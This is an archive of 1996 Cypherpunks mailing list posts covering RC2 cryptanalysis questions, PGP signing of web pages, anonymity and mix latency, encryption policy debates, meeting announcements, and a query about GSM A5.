> clique is pre-programmed to defend you in the face of your transgressions.  
> I notice that some of them don't even know what a key-signing meeting is 
> FOR:  I've received commentary which suggests that they believe that 
> key-signing somehow vouches for the HONESTY of the person involved; not his 
> IDENTITY.
> 
> Until you start responding substantively to legitimate complaints, that is 
> all you deserve.  The public needs to be warned about people like you.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMRHIE/qHVDBboB2dAQHHMAQAkTFZaMMF6asl79yU8RSkd5O0zYElg9so
> syuonRR1UnrzTGlQ2cT/8GPZhuV/IIBSiroxu7EwCX6ASR6BTRUGVdTWbN3l27Vi
> M6FRiduXpBvzpIzQ7XOzwcvPv0D/bLXwXPGHzmUzqsk3chWpsskKw1PKZun7wCKL
> fG2MVim+Vqk=
> =Di2Q
> -----END PGP SIGNATURE-----
> 
> 

______________________________________________________________________________

Paul Kanz 
System Administrator
Interconnectix, Inc.
10220 SW Nimbus Ave, Building K4
Portland, OR 97223
Email:  paul@icx.com
Phone:  503.684.6641
Fax:    503.639.3469
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Sat, 3 Feb 1996 02:52:35 +0800
To: cypherpunks@toad.com
Subject: RC2 technical questions
Message-ID: <9601028232.AA823283956@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        In a shameless attempt to move the discussion of RC2 into
a more technical arena, here are some interesting questions to
explore about RC2.
                --Bob

Key expansion
- How can you tell whether the permutation is based on
  some sequence of digits from PI?
- What are the diffusion and avalanche properties of
  this permutation?
- What are the linear characteristics of this permutation?
- What are the properties of the compression function
  that maps 16 bits (bytes X and Y) to 8 bits (byte Z)
  via Z = P[X + Y]?
- How does the length of the key influence the mixing
  of bits during each pass of the expansion algorithm?
  - Is this a non-linear feedback shift register over
    the field GF(256)?
- If the first pass of expansion is viewed as a hash
  function that produces 40 or 128 bits out, what are
  its properties?

Round Functions
- What are the diffusion and avalanche properties of
  the two round functions?
- What are the linear approximations and how good are they?
- What characteristics can be preserved by the round
  function that performs rotations?
  - With what probability?
  - Does the amount of rotation influence the security?
- What characteristics can be preserved by the round
  function that performs the data dependent selection
  of the expanded key?
  - With what probability?
- Are there any "weak" keys?  
  - Will the expansion algorithm produce them?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Feb 1996 04:25:56 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: FEBRUARY MEETING
Message-ID: <Pine.SUN.3.91.960202094403.20053A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The February Bay Area Cypherpunks meeting will start at noon in
downtown San Francisco.  The address and directions are:

The meeting will be on the fourth floor of 388 Market St.  The 
building is bounded by Market, Pine and Front (Front is the
north-of-Market extension of Fremont St.)  There are numerous
parking garages in the area.

You will have to sign in at the security desk in the lobby.  You
need to indicate that you are going to "Simple Access" on the
4th floor.  After you get off the elevator there will be signs
directing you to the conference room.

388 is above the Embarcadero BART and Muni Metro station.  Other
public transit links exist from the Transbay Terminal and the
Caltrain Depot.  If you have any questions about how to get to
the meeting, let me know.  If you are driving:

>From the Peninsula:

1.  Take 101 north to 80.
2.  Take 80 east to the 4th Street exit.
3.  Take Bryant east (north-east, actually) to Fremont.
4.  Turn left on Fremont and drive to Market.
5.  You are there, but now you need to find a place to park.  
6.  (You should have taken public transit!)

>From the East Bay:

1.  Take 80 west to the Fremont exit.
    Follow directions 4 thru 6, above.


 S a n d y

P.S.  About 50 people have already RSVPed my party invitation.
      If you have not told me if you will attending my party, 
      please do so.  I need to know how much stuff to get.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 3 Feb 1996 00:23:22 +0800
To: Tony Iannotti <tony@secapl.com>
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <Pine.A32.3.91.960202071529.72228B-100000@fred.secapl.com>
Message-ID: <Pine.SUN.3.91.960202104319.14626B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Feb 1996, Tony Iannotti wrote:

> On Thu, 1 Feb 1996, Rich Salz wrote:
> 
> > At any rate, I'll stop my comparison of the distributed RC2 and the 
> > licensed RC2 since RSA's done it for us. :)
> 
> What if it's just a ruse by them to ID it as RC2? They could have even
> released a bogus version themselves, and then sent up a hue and cry.... 

There's an easy test.. set up the real RC2 to encrypt data and have this 
one decrypt it, then reverse the two, use different keys, etc...  a few 
thousand rounds should give a strong indication if this is the true RC2.

It doesn't mean that it wasn't rigged to produce weak keys and such, 
however a closer analysis of the source will point that out. :)

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 01:54:32 +0800
To: cypherpunks@toad.com
Subject: Re: Alien factoring breakthroughs
Message-ID: <ad3788d111021004e1ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:47 AM 2/2/96, anonymous-remailer@shell.portal.com wrote:

>From: remallin@dorsai.dorsai.org (Richard Mallinson)

>The Grays have renegged on their abduction quota agreement, and are
>abducting many more people than before. Most of these are returned, after
>being implanted with a device which allows the grays to have total control
>over their thoughts and actions. Approximately 40% of Americans now carry
>one of these devices, which are impossible to remove without killing the
>host.

And several of these Gray-implanted abductees were ordered to subscribe to
the Cypherpunks list! Known as "Tentacles," they share the same hive mind
and report periodically to the mother base in Colorado.

I'm sure you all know by now that "RSA" refers to their home star systems:
Rigel, Sirius, and Arcturis.


--Tim "Spooky" May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 02:11:54 +0800
To: cypherpunks@toad.com
Subject: End-to-End Encryption
Message-ID: <ad378ca712021004c83e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:57 PM 2/2/96, Anonymous wrote:

>Is there technology for eluding these espionage-enabled
>chokepoints -- tunneling, satellite-richochet or
>otherwise?

End-to-end encryption.

So long as users can do end-to-end encryption, at various levels (that is,
end users use things like PGP, other levels use things like SWIPE or
PipeNet, etc.), what surveillance organizations do to monitor channels is
not so critical.

And remailers and proxies make traffic analysis less possible.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 04:28:36 +0800
To: bryce@colorado.edu
Subject: Re: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <199602021350.GAA03188@nag.cs.colorado.edu>
Message-ID: <Pine.ULT.3.91.960202110332.19670B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Feb 1996, Bryce wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
>  An entity calling itself "Declan B. McCullagh" <declan+@CMU.EDU>
>  is alleged to have written:
> > 
> > Now, this guy copied that file from my web site. Fine -- it was up for
> > FTP. But editing my comments to *support* Neo-Nazis and leaving my name
> > is just fucking too much. I've sent him polite mail requesting a change.
> > We'll see what happens.
> 
> Polite?  You show more restraint than most of us would 
> I suspect.  Actually it is probably a good tactic for the
> first encounter.

Certainly a lot more polite than I am...
 
> > Cypherpunk relevance? Authentication for web pages. There's no reason
> > for a reasonable person to believe, at first glance, that I was *not*
> > the author.
> 
> It is possible to PGP-clearsign web pages using comments.
> PGP's insertion of "- " before any line beginning with "-"
> might cause a problem, but you'll just have to be a little
> more careful.

What's wrong with a prominent PGP-signed notice in <PRE>'s that "This
page, at URL [whatever], has a separate PGP signature at [other URL]." 
I've did that with the windows networking FAQ a few times until it just 
got to be too much trouble.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 02:37:14 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity -> Untraceability -> High Latency?
Message-ID: <ad378db51302100407b8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:19 AM 2/2/96, Nelson Minar wrote:
>I've been trying out various mechanisms for anonymity: remailer
>chains, HTTP proxies. There's one problem that makes them inconvenient
>to use regularly: latency.

"Latency" is not necessary for mix security. What is important is the
number of messages mixed together in the mix. If it is desired that N = 10
and only 10 messages are entering the mix per hour, then, on average, the
mix must wait an hour. E.g., "latency = one hour." If however, 100 messages
are entering the mix per hour, then "latency = 6 minutes."

>A good Type I remailer chain takes at least an hour to deliver email,
>instead of the 15 seconds I'm used to. Mixmaster-style takes even
>longer; the delay is important to the security of the system.

None of these points is necessarily true.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Sat, 3 Feb 1996 04:35:21 +0800
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Greed
Message-ID: <v02110102ad3807f0e5c1@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


This scenario has one problem: the providers have determined that large
public peering points like the CIX, NAPs, MAEs, and FIXs do not scale well,
and that for the continued health and growth of the Internet, there are
going to have to be more small, private interconnects between providers.

Put another way: if the equipment you're working with has certain limits
(let's say 100Mb/s FDDI or 45Mb/s T3/DS3 interfaces), it's better to have
more interconnects with fewer peers at each interconnect point when your
traffic potentially or actually will exceed those interface limits in
aggregate. This is being driven by the incredible growth of the Internet,
and by the fact that the customers can (and do) buy the same size pipes
into the providers that the providers themselves use for their backbones -
i.e. any such customer can potentially fill your backbone around the
section of your backbone where he connects to you. Ooops.

If you want to have fewer, large interconnects, which, incidentally, you
can monitor all the traffic passing through, you've gotta have monstrous
point-to-point bit pipes and/or LANs, and the Router/Switch From Hell to
make the traffic move. There are people trying to build such things - it's
called Asynchronous Transfer Mode (ATM), but it doesn't really work in
practice yet at high enough speeds - best you can get at the moment is OC3
(155Mb/s), which is only a trifle faster than FDDI, and the stuff is more
expensive than conventional LAN/WAN technology, so it's only being used in
small areas to prove the technology (with the hope that it really does
scale as promised, and gets cheaper). There are working examples of a fast
LAN switch in use at the public peering points: the DEC GIGAswitch (3.2Gb/s
aggregate - 16 100Mb/s FDDI ports).

Of course, you also have to build a pretty fast computer to suck down all
this traffic and analyze it, too. And we all have the ultimate laugh on
would-be eavesdroppers: IP security (read: end-to-end encryption of the
data payload of IP packets on a per peer basis), drafts for which are in
implementation phase as of the Stockholm IETF meeting (July 1995). This
leaves 'em with just traffic analysis to use on us.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alano@teleport.com>
Date: Sat, 3 Feb 1996 04:55:23 +0800
To: cypherpunks@toad.com
Subject: Re: Your mail
Message-ID: <199602022009.MAA08670@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain




>re: Virus site (http://www.xcitement.com/virus/) reports error 404 - no 
>such file...

To make matters worse, the code on the site was poorly written so that web wacker choked when I tried to download the site.

I guess the Grays captured the site.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 05:27:07 +0800
To: bryce@colorado.edu
Subject: Re: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <199602021955.MAA01950@nagina.cs.colorado.edu>
Message-ID: <Pine.ULT.3.91.960202120722.19670I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Feb 1996, Bryce wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > What's wrong with a prominent PGP-signed notice in <PRE>'s that "This
> > page, at URL [whatever], has a separate PGP signature at [other URL]." 
> > I've did that with the windows networking FAQ a few times until it just 
> > got to be too much trouble.
> 
> That's a good idea, but I don't see any reason to sign the 
> notice.

For the paranoid, it would be an added assurance that they are reading the
original file at the original location. Otherwise, anybody could copy the
Web page, modify it, and give it someone else's PGP signature. 

But yeah, it would look awfully silly, especially to the non-PGP-aware
public. An unobstrusive PGP logo (below) would be great, and might become
a status symbol, like those cheesy HTML validation service and Internet
Audit Bureau logos (which I have used on a few pages). 

> Just put a "PGP signed" logo at the bottom of the
> page.  If the user clicks on it then it hrefs to a .asc
> file (or is it better to have a .html file is the
> signature in <pre>...) which contains the detached sig for
> the original page.
> 
> This would also have the bonus effect of making PGP more
> visible to the web-browsing public.  I'll work on this
> during my.. err.. "spare time".

Yeah, I like the idea of a standardized logo. A lot.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Feb 1996 06:40:16 +0800
To: Gary Edstrom <gbe@primenet.com>
Subject: Re: FEBRUARY MEETING
In-Reply-To: <311274f5.248877750@mailhost.primenet.com>
Message-ID: <Pine.SUN.3.91.960202123454.27662B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Gary Edstrom pointed out to me that I forgot a minor detail about
the upcoming meeting and party--the date.  

They will be on Saturday 10 February.

Sorry about that.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 3 Feb 1996 04:38:48 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <Pine.ULT.3.91.960202110332.19670B-100000@Networking.Stanford.EDU>
Message-ID: <199602021955.MAA01950@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> What's wrong with a prominent PGP-signed notice in <PRE>'s that "This
> page, at URL [whatever], has a separate PGP signature at [other URL]." 
> I've did that with the windows networking FAQ a few times until it just 
> got to be too much trouble.


That's a good idea, but I don't see any reason to sign the 
notice.  Just put a "PGP signed" logo at the bottom of the
page.  If the user clicks on it then it hrefs to a .asc
file (or is it better to have a .html file is the
signature in <pre>...) which contains the detached sig for
the original page.


This would also have the bonus effect of making PGP more
visible to the web-browsing public.  I'll work on this
during my.. err.. "spare time".


Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRJsP/WZSllhfG25AQEimAP+O1SJBflS+rOQZ5K9bNwJYxuzhBBgRjvR
qePJn1d+uQvBs1sHgoofu7R8DbcHX1BEyCc2YUBC0i+fSu0sR3+nYawdcj6Wem9L
WEDmspbp2TMj35v8AtUinKNqfZqfG6S9Hsb7DColCxpuvvkFTdFGNJBkqgEFHS46
gANShEspa/4=
=54jP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Sat, 3 Feb 1996 05:02:50 +0800
To: "banjo, lord of the c monkeys" <kelli@zeus.towson.edu>
Subject: Re: CDA as a tool (was: Re: Helping the Crypto-Clueless)
Message-ID: <v01530502ad3805928a01@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


banjo, lord of the c monkeys (is that a 1,000 monkeys trying for RSA code,
12 monkeys trying for a screenplay to a Terry Gilliam film?) wrote:

>I agree:  and in addition to that [stuff deleted above], I'd like to say
>that >contrary to the beliefs of some people on this list, I don't think
>the CDA is
>representative of a legislative body's spiteful action against general
>free speech and information; it's far to simple a motivation for
>computer-illiterate, re-election minded professional politicians.

The legislators may not have known or understood what they voted for,
however, the fact of the matter remains is there were a host of groups
(primarily the Christian Coalition) who know what the Internet can do to
prevent them from dominating public discourse and dictating policy to the
GOP. They used the congress and a press-release driven news media to get
their way.


bill.humphries@msn.fullfeed.com
(not affiliated with the Microsoft Network)
@$#! Henry Hyde, #!*% James Exon, !@$! Ralph Reed






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Duvos <mpd@netcom.com>
Date: Sat, 3 Feb 1996 06:32:23 +0800
To: mpd@netcom.com
Subject: Futplex makes the news!
Message-ID: <199602022119.NAA29620@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rah@shipwright.com (Robert Hettinga) wrote:

 > I just heard on WBUR (NPR) here in Boston that our own L. (I 
 > know his real first name now...) "Futplex" McCarthy was busted
 > by the UMASS diginarks for putting "Nazi material" on the 
 > internet. This must be one of those Nazi-mirrors I've been 
 > skipping articles over...

Horrors.  

We seem to be discovering more and more side effects from the 
defense of free speech for the unpopular.  The Holocausta Nostra
is cheering wildly at the opportunity to present the works of
Mr. Zundel under a banner reading "Nazi Scum".  Zundelsites are
being set up by people whose views are so disgusting they probably
offend even Mr. Zundel himself.  And now our very own "Futplex" 
will have to live the rest of his life branded as a electronic
distributor of "hate literature" by the forces of political
correctness at UMASS.  

It may be time to regroup and take inventory of what we are 
suposedly trying to accomplish here. 

--
X-Signature: Mike Duvos
X-Signature-File: c:\netcom\mail.sig


On a completely different note, which I am appending so as to waste
as little bandwidth as possible, Cypherpunks messages to my netcom
account stopped dead two days ago, and I am getting no response from
either majordomo@toad.com or cypherpunks-owner@toad.com.  

I am currently reading the list quite nicely on 

        news://news.hks.net/hks.lists.cypherpunks

using Netscape so it really isn't a big deal, but I was just curious
if there was a routing problem or some other Net glitch.

Please EMAIL any replies. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Sat, 3 Feb 1996 07:44:17 +0800
To: cypherpunks@toad.com
Subject: RSA disappears :-)
Message-ID: <2.2.32.19960202212818.016da488@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


rsa.com dissapeard from the net!  The only valid nameserver for rsa.com is
rsa.com and since it's net connection is down anybody trying to talk to
www.rsa.com or send mail to rsa is getting host not found errors.

:-)


--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 3 Feb 1996 03:26:49 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Denning's misleading statements
In-Reply-To: <Pine.BSD.3.91.960202010152.21664A-100000@ahcbsd1.ovnet.com>
Message-ID: <199602021832.NAA12047@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
>   A few days ago I bought Markoff and Shimomura's Takedown. I've 
>   read the first three chapters. 
>  
>   In my opinion: 
>  
>     (1)  the book is an important part of that well orchestrated 
>          Psy Ops campaign 
> 
>     (2)  the book's designed from the word go to play that part. 

(3) You have been taking lots of really good drugs recently, but
    haven't quite come down yet.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tedwards@access.digex.net
Date: Sat, 3 Feb 1996 03:20:29 +0800
To: von@Pulver.COM
Subject: Re: Voice On the Net Digest V2 #44
In-Reply-To: <199602021245.HAA10963@enterprise.pulver.com>
Message-ID: <Pine.SUN.3.91.960202132426.18728A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




> From: "Shane D. Mattaway" <shane@netspeak.com>
> Date: Thu, 1 Feb 1996 07:12:32 -0500
> Subject: [VON]: WebPhone Beta 6 Release

> AUDIO ENCRYPTION
> All audio transmissions are encrypted to provide secure conversations
> without any performance overhead. Encryption is accomplished using a
> proprietary algorithm.

If the encryption is secure, there is no need to have "security through 
obscurity."  

I rather doubt that the makers of WebPhone have invented a proprietary
encryption method that actually provides a high level of security.  Most
truly secure encryption methods (DES, RSA, IDEA) are presented for peer
review for years before the academic and cryptographic communities deem
them to be reasonably secure. 

It is easy to claim you have a secure encryption algorithm - but most such 
algorithms turn out later to have serious security holes.  Only some 
manage to hold up to their security claims under close academic analysis.

PGPfone's encryption methods are available for public inspection, and are 
generally accepted by the cryptographic community to be secure.

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 3 Feb 1996 04:04:57 +0800
To: Hroller Anonymous Remailer <hroller@c2.org>
Subject: Re: your mail
In-Reply-To: <199602010110.RAA21647@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960202135319.18690A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


re: Virus site (http://www.xcitement.com/virus/) reports error 404 - no 
such file...

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 3 Feb 1996 04:37:40 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Active processes monitoring?
In-Reply-To: <9602010555.AA19695@cti02.citenet.net>
Message-ID: <Pine.SUN.3.91.960202135824.18690B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, Jean-Francois Avon wrote:

> Hi!
> 
> I'm running on a first generation 486 ISA 4meg ram Win 3.11
> I use realdeal /commercial  and wipeswap.exe in an *.bat that launch Win3.11
> How can I detect if another process is running on my system?
> I use MEM /c in a dos window.  But is that sufficient?
> Can a hidden process detect MEM loading and hide itself somehow?
> 
> Are there others applications like MEM that are not as universal?
> (here, I guess that such stealth behaviour have to rely on identifying the
> program being loaded, thus, a less common program has less chance of 
> being fooled)

Mem /C doesn't do squat under 95... don't know about 3.11.... since each 
DOS box runs in its own space, MEM /C cannot see what processes are 
running in Windoze.

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 3 Feb 1996 04:28:59 +0800
To: cypherpunks@toad.com
Subject: Re: Active processes monitoring?
Message-ID: <9602021919.AA08293@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


on feb 2 96, sunder@dorsai.org replied to me:

>On Thu, 1 Feb 1996, Jean-Francois Avon wrote:
>
>> Hi!
>> 
>> I'm running on a first generation 486 ISA 4meg ram Win 3.11
>> I use realdeal /commercial  and wipeswap.exe in an *.bat that launch Win3.11
>> How can I detect if another process is running on my system?
>> I use MEM /c in a dos window.  But is that sufficient?
>> Can a hidden process detect MEM loading and hide itself somehow?

>Mem /C doesn't do squat under 95... don't know about 3.11.... since each 
>DOS box runs in its own space, MEM /C cannot see what processes are 
>running in Windoze.

AFAIK, when I do mem /c in a dos windows, under W3.11wg, it seems to report
all processes that I expect that would be running in the machine.

It reports win something processes,
it reports realdeal, cd-rom drivers and everything (I think...)

Can anybody Wizzard-type can reply on this one?

Or RTFM us with the proper references...

Thanks and Regards

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianh@u163.wi.vp.com (Brian Hills)
Date: Sat, 3 Feb 1996 05:34:36 +0800
To: cypherpunks@toad.com
Subject: http://www.xcitement.com/virus/
Message-ID: <m0tiS8X-00025JC@u163.wi.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


It was up yesterday. I was there. and does have alot of info.
> 
> re: Virus site (http://www.xcitement.com/virus/) reports error 404 - no 
> such file...
> 
> ==========================================================================
>  + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
>   \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
> <--+-->|                 |liness and god is empty,  just like me,|   \|
>   /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
>  + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
> ===================http://www.dorsai.org/~sunder/=========================
> 
> 


-- 
UNTIL WE MEET AGAIN :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 4 Feb 1996 08:58:56 +0800
To: Mike Duvos <declan@eff.org
Subject: Re: Futplex makes the news!
In-Reply-To: <199602022119.NAA29620@ix6.ix.netcom.com>
Message-ID: <Pine.ULT.3.91.960202143200.20243H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 2 Feb 1996, Mike Duvos wrote:

> It may be time to regroup and take inventory of what we are 
> suposedly trying to accomplish here. 

I believe we *have* regrouped sufficiently, and I am doing my best to give
followup stories what I believe to be the correct spin. 

UMass will be *humiliated* if we play this right. Whom do we call?

For what I think is a good story (I wish they'd credited cypherpunks and 
other people more, but they do need to play up the local angle), see:

 http://www-Daily.stanford.edu/2-2-96/NEWS/index.html

AFAIK, futplex is the only person who has suffered any kind of negative
impact from these events. Except for cpunk reactions to my very poor
postings here, and *one* person who thought I was a Nazi (and who was
corrected, and apologized), I've been getting nothing but praise. 

IMHO, the correct response is to stop whining and trumpet victory, loudly,
and slam Exon and the CDA while we're at it. 

"This story shows that the so-called Communications Decency Act is just 
as ill-advised. If only four people at a handful of major universities 
can defeat German censorship of someone everybody hates, how can we 
expect mere laws to prevent the spread of indeterminate 'indecent' 
material on the Internet, which any teenager is interested in."

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRKUXI3DXUbM57SdAQF3FQP/aVjiP4/yTj7Atuq409NJCuCB7deEpqvF
JcebTz1jG8D4M08VGhjOgFDGs+cNJ1zKXB3AZ9OLuCDnTr4oONsvPo2e3RnbZUYe
YMHBFsKNisq5FRAGOy2UwBbukI+NauFDAzKvCfQJBs5iPpk6aE8sEtwu+ja5nYBs
y8zjtjSuMDQ=
=jUPV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sat, 3 Feb 1996 08:43:41 +0800
To: cypherpunks@toad.com
Subject: Looking for GSM A5 info
Message-ID: <v03004a09ad38400c7d12@[198.93.25.66]>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for information about the A5 encryption algorithm used in
GSM phones. Specifically:

- How does the algorithm work and is its encryption methodology similar
to any other well-known algorithms?

- Is A5's implementation mandatory to produce an world-wide
interoperable GSM device?

- What are the variants of A5 (there was some discussion of less secure
versions), how do they differ, and where are they used?

- Are there any known weaknesses in or attacks on A5-encrypted GSM
conversations?

